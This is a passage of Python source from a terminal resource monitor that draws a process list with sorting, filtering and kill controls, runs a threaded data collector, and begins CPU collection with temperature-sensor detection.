("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
min_w: int = 44
min_h: int = 16
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key in ["up", "k"]:
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key in ["down", "j"]:
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
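#* Small cpu graphs per process: created once a process goes above 1% cpu and removed again after 10 consecutive updates below 1% (tracked by pid_counter)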
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
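#* Map the current scroll offset (cls.start) proportionally onto the scrollbar track between the up and down arrows, clamping at the first and last page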
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
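#* Thread handshake: collect() waits for collect_idle, fills collect_queue and sets collect_run; _runner() clears collect_idle/collect_done while collecting and drawing, then sets both so callers can wait for completion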
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
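#* When proc_update_mult > 1 the process collector only stays in the queue once every proc_update_mult full cycles, counted by proc_counter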
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_upper: List[int] = []
cpu_lower: List[int] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(ceil(psutil.cpu_percent(percpu=False)))
